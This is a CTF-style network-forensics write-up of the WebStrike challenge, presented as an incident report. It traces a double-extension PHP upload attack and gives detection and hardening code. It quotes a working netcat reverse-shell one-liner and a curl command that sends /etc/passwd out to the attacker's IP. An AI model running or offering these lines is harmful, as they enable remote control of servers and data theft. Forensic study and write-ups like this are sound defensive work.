Incident Response Report: WebStrike — Server Compromise & Network Forensics Investigation
Platform: CyberDefenders
Challenge: WebStrike
Category: Network Forensics / Incident Response
Difficulty: Medium
Classification: Confidential
Tools: Wireshark, AbuseIPDB, IP Geolocation, OSINT
Achievement: Proof of Completion
1. Executive Summary
Incident Type: Web Server Compromise / Reverse Shell / Data Exfiltration
Analyst: Lead SOC Analyst / Threat Hunter
A severe security incident occurred on the WebStrike corporate web server (24.49.63.79). Development teams flagged anomalous behavior, prompting a full network packet capture (PCAP) analysis.
The investigation revealed that an external threat actor successfully compromised the web server by exploiting an unrestricted file upload vulnerability. By bypassing weak extension filters using a double-extension technique (.jpg.php), the attacker uploaded a malicious PHP script. Upon execution, this script established an interactive reverse shell back to the attacker’s infrastructure. Operating as the www-data user, the attacker performed internal reconnaissance and successfully exfiltrated sensitive system configuration files (/etc/passwd).
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| Attacker IP | 117.11.88.124 | External threat actor IP, geolocated to Tianjin, China. |
| Victim IP | 24.49.63.79 | Compromised WebStrike Apache Web Server. |
| Malicious File | image.jpg.php | PHP reverse shell disguised as a JPEG image. |
| C2 Port | 8080 (TCP) | Port used by the attacker to catch the reverse shell. |
| User-Agent | Mozilla/5.0 (X11; Linux x86_64; rv:109.0)... | Fingerprint heavily associated with Kali Linux default browsers. |
MITRE ATT&CK Mapping Overview
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Persistence | Server Software Component: Web Shell | T1505.003 |
| Command and Control (C2) | Proxy (Reverse connection over non-standard port 8080) | T1090 |
| Discovery | Account Discovery: Local Account | T1087.001 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
2. Phase 1: Reconnaissance & Attacker Identification
Objective: Isolate the threat actor’s IP and establish their identity through OSINT enrichment.
Initial PCAP Triage
Initial triage of the PCAP file focused on isolating communication between the web server and external entities. Traffic volume and repetitive HTTP requests quickly isolated IP 117.11.88.124 as the primary threat actor.
OSINT Enrichment: IP Geolocation
OSINT enrichment via IP geolocation and threat intelligence databases (AbuseIPDB) confirmed the IP originates from Tianjin, China. The IP has a documented history of port scanning and unauthorized connection attempts, providing high confidence of malicious intent.
OSINT Enrichment: AbuseIPDB Threat Intelligence
Analyst Note:
The IP 117.11.88.124 has been reported 19 times from 7 distinct sources on AbuseIPDB, with categories including Port Scan, Hacking, and Exploited Host. This corroborates the assessment of malicious intent.
User-Agent Analysis
Analysis of the HTTP request headers revealed a consistent User-Agent string: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0. This specific combination (Firefox ESR on Linux x86_64) is highly indicative of an attacker operating from a default Kali Linux distribution, highlighting a lack of operational security (OpSec) by the threat actor.
3. Phase 2: Execution & Web Shell Deployment
Objective: Determine the method of compromise by analyzing HTTP traffic for malicious data submissions.
Identifying the Attack Vector
To determine the method of compromise, traffic was filtered for HTTP POST requests (http.request.method == "POST"), revealing the attacker’s interaction with the /reviews/upload.php endpoint.
HTTP Stream Analysis: The Exploit
Following the HTTP stream of this POST request exposed the core exploit. The attacker intercepted a legitimate review form and injected a malicious payload.
Vulnerability Exploited: The application failed to properly validate uploaded file types. The attacker utilized a double-extension bypass, naming their payload image.jpg.php. The server likely checked for the presence of .jpg, but Apache executed the file based on its terminating extension (.php).
The payload contained the following highly malicious PHP command:
```php
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 117.11.88.124 8080 >/tmp/f"); ?>
```
This one-liner creates a named pipe (/tmp/f), starts an interactive shell (/bin/sh -i) that reads its input from the pipe, and sends the shell's output through Netcat (nc) to the attacker on 117.11.88.124:8080; whatever the attacker sends back is written into the pipe and becomes the shell's next input.
MITRE ATT&CK Reference:
This attack leverages T1190 - Exploit Public-Facing Application (exploiting the file upload form) and T1505.003 - Server Software Component: Web Shell (deploying image.jpg.php as a persistent web shell). The execution of the reverse shell maps to T1059.004 - Command and Scripting Interpreter: Unix Shell.
4. Phase 3: Triggering the Payload & Command and Control (C2)
Objective: Trace how the attacker located and executed their uploaded web shell.
Directory Brute-Forcing
Uploading a web shell does not automatically execute it. The attacker was observed performing basic directory brute-forcing (attempting to access /admin/uploads and /uploads which resulted in 404 errors) to locate their payload.
Triggering the Reverse Shell
Ultimately, the attacker successfully identified the storage directory as /reviews/uploads/. By sending a GET request to /reviews/uploads/image.jpg.php, the attacker forced the Apache server to interpret the PHP code, officially triggering the reverse shell connection back to their machine on port 8080.
Analyst Note:
The attacker’s need to brute-force the upload directory suggests limited prior reconnaissance of the application’s directory structure. The upload directory /reviews/uploads/ was not immediately obvious, and the attacker required multiple attempts to locate it.
5. Phase 4: Post-Exploitation & Data Exfiltration
Objective: Analyze the attacker’s actions after establishing a reverse shell.
Reverse Shell Session Analysis
With a stable reverse shell established over TCP port 8080, the attacker gained command-line access as the www-data service account. By following the TCP stream of this connection, the entirety of the attacker’s post-exploitation session was captured.
The attacker executed standard situational awareness commands (whoami, uname -a, pwd, ls /home) to map the internal environment and search for privilege escalation vectors.
Data Exfiltration
Finally, the attacker targeted sensitive system files. They read /etc/passwd, the local account database, and used the curl utility to POST the data back to their own infrastructure on TCP port 443, the port normally used for HTTPS, in an attempt to blend in with standard web traffic.
Exfiltrated File: /etc/passwd
Exfiltration Command:
```sh
curl -X POST -d /etc/passwd http://117.11.88.124:443/
```
MITRE ATT&CK Reference:
The post-exploitation activity maps to:
- T1087.001 - Account Discovery: Local Account (Reading /etc/passwd)
- T1041 - Exfiltration Over C2 Channel (Using curl to POST data back to the attacker)
- T1090 - Proxy (Reverse connection over non-standard port 8080 for C2)
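As an added example (not part of the original report or the CyberDefenders challenge material), the following Python detection logic replays the attack chain from Phases 2 to 4 over constructed HTTP request and TCP flow records. The record fields, the benign visitor 203.0.113.5 and the 404 threshold are assumptions.

```python
import re
from collections import namedtuple

WEB_SERVER = "24.49.63.79"        # victim web server (from the report)
UPLOAD_DIR = "/reviews/uploads/"  # upload storage directory (from the report)
# A script extension preceded by another extension, e.g. image.jpg.php
DOUBLE_EXT = re.compile(r"\.\w+\.(?:php\d?|phtml|phar)$", re.IGNORECASE)

# filename is the multipart filename= field of an upload, if any (constructed schema)
HttpReq = namedtuple("HttpReq", "src method uri status filename", defaults=("",))
Flow = namedtuple("Flow", "src dst dport")  # one TCP connection, initiator first


def triage(requests, flows):
    """Return (stage, host, detail) findings in the order they were observed."""
    findings, clients, probes = [], set(), {}
    for r in requests:
        clients.add(r.src)
        if r.method == "POST" and DOUBLE_EXT.search(r.filename):
            findings.append(("upload-double-ext", r.src, r.filename))
        if r.method == "GET" and r.uri.startswith(UPLOAD_DIR) and r.uri.lower().endswith(".php"):
            findings.append(("script-in-uploads", r.src, r.uri))
        if r.status == 404:
            probes[r.src] = probes.get(r.src, 0) + 1
    for src, n in probes.items():
        if n >= 2:  # threshold is an assumption; tune to the site's normal 404 rate
            findings.append(("dir-bruteforce", src, f"{n} x 404"))
    # Strongest signal: the web server *initiating* a connection to a host that
    # was just an HTTP client of it (reverse shell on 8080, curl exfil on 443).
    for f in flows:
        if f.src == WEB_SERVER and f.dst in clients:
            findings.append(("server-initiated-conn", f.dst, f"tcp/{f.dport}"))
    return findings


# Constructed records reproducing the sequence described in the report
REQUESTS = [
    HttpReq("117.11.88.124", "POST", "/reviews/upload.php", 200, "image.jpg.php"),
    HttpReq("117.11.88.124", "GET", "/admin/uploads/image.jpg.php", 404),
    HttpReq("117.11.88.124", "GET", "/uploads/image.jpg.php", 404),
    HttpReq("117.11.88.124", "GET", "/reviews/uploads/image.jpg.php", 200),
    HttpReq("203.0.113.5", "GET", "/reviews/", 200),  # benign visitor
]
FLOWS = [
    Flow(WEB_SERVER, "117.11.88.124", 8080),  # reverse shell
    Flow(WEB_SERVER, "117.11.88.124", 443),   # curl exfiltration
    Flow("203.0.113.5", WEB_SERVER, 80),      # normal inbound web traffic
]
```

Running `triage(REQUESTS, FLOWS)` yields one finding per stage of the compromise, with the server-initiated connections being the alerts worth paging on even when the upload itself was missed.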
6. Remediation & Mitigation Recommendations
To prevent future compromises of this nature, the following actions must be taken immediately:
Strict Input Validation
Rewrite the file upload handling logic on /reviews/upload.php. Implement strict allow-listing for MIME types (e.g., image/jpeg, image/png) rather than relying on block-listing or simple string matching.
File Renaming Strategy
Never store uploaded files using their original, user-supplied names. Implement a mechanism to programmatically rename files (e.g., generating a unique hash) and strip all original file extensions to neutralize double-extension attacks.
Execution Prevention
Configure the Apache web server to explicitly deny the execution of scripts (PHP, CGI, etc.) within the /reviews/uploads/ directory.
Network Segmentation & Firewalling
Immediately block all inbound and outbound traffic to the known malicious IP (117.11.88.124). Furthermore, restrict the web server’s ability to initiate outbound connections (like the curl command) to the internet, unless explicitly required for business purposes.
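The three application-level recommendations above (strict allow-listing, renaming with extension stripping, and execution prevention) as one added Python example that is not the WebStrike application's own code: the upload is accepted by its file signature rather than the client-supplied name or Content-Type, stored under a hash-derived name that discards every declared extension, and the Apache fragment denies execution in the upload directory. The document-root path, the mod_php assumption and the sample JPEG bytes are placeholders.

```python
import hashlib

# Allow-list keyed by file signature (magic bytes), never by the client-supplied
# name or Content-Type header, both of which the attacker controls.
ALLOWED_SIGNATURES = {
    b"\xff\xd8\xff": ("image/jpeg", "jpg"),
    b"\x89PNG\r\n\x1a\n": ("image/png", "png"),
}

class UploadRejected(ValueError):
    pass

def store_name_for(original_name: str, content: bytes) -> str:
    """Validate an upload and return the only name it may be stored under.
    The original name (e.g. image.jpg.php) is used for logging only; every
    extension it carried is discarded, so a double extension cannot survive."""
    for magic, (mime, ext) in ALLOWED_SIGNATURES.items():
        if content.startswith(magic):
            break
    else:
        raise UploadRejected(f"{original_name!r}: content is not an allowed image type")
    # A valid image header followed by a PHP open tag is a polyglot; reject it
    # instead of relying on the directory-level execution ban alone.
    if b"<?php" in content:
        raise UploadRejected(f"{original_name!r}: embedded PHP open tag")
    digest = hashlib.sha256(content).hexdigest()
    return f"{digest}.{ext}"  # extension is assigned from the detected type

def is_accepted(original_name: str, content: bytes) -> bool:
    """Convenience wrapper for policy checks and tests."""
    try:
        store_name_for(original_name, content)
        return True
    except UploadRejected:
        return False

# Constructed minimal JPEG header (SOI + APP0/JFIF marker), not a real photo
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"

# Apache fragment for the upload directory; the path is a placeholder and
# php_admin_flag assumes mod_php (with php-fpm, deny the handler in the pool).
APACHE_UPLOADS_CONF = """\
<Directory "/var/www/html/reviews/uploads">
    php_admin_flag engine off
    <FilesMatch "\\.(ph(p[0-9]?|tml|ar)|cgi|pl|py)$">
        Require all denied
    </FilesMatch>
</Directory>
"""
```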
7. Conclusion
The WebStrike investigation demonstrates a complete web server compromise from initial exploitation to data exfiltration. Key findings include:
- Initial Access: Exploitation of an unrestricted file upload vulnerability on /reviews/upload.php using a double-extension bypass (image.jpg.php).
- Attacker Profile: The threat actor operated from IP 117.11.88.124 (Tianjin, China) using a default Kali Linux distribution, indicating a lack of operational security.
- Execution: A PHP reverse shell was uploaded and triggered, establishing a persistent connection back to the attacker on TCP port 8080.
- Post-Exploitation: The attacker performed internal reconnaissance as the www-data user and successfully exfiltrated /etc/passwd using curl over port 443.
- Impact: Sensitive system configuration data was exfiltrated, potentially exposing user account information and enabling further attacks.
Key Takeaways for the SOC:
- Input Validation: Implement strict file upload validation with MIME type allow-listing and file renaming.
- Web Server Hardening: Disable script execution in upload directories.
- Network Monitoring: Alert on outbound connections from web servers, especially on suspicious ports (8080, 443 from non-browser processes).
- Threat Intelligence: Monitor and block known malicious IPs using threat feeds from AbuseIPDB and similar platforms.
Analysis Date: February 27, 2026
Analyst: El OMARI Zakaria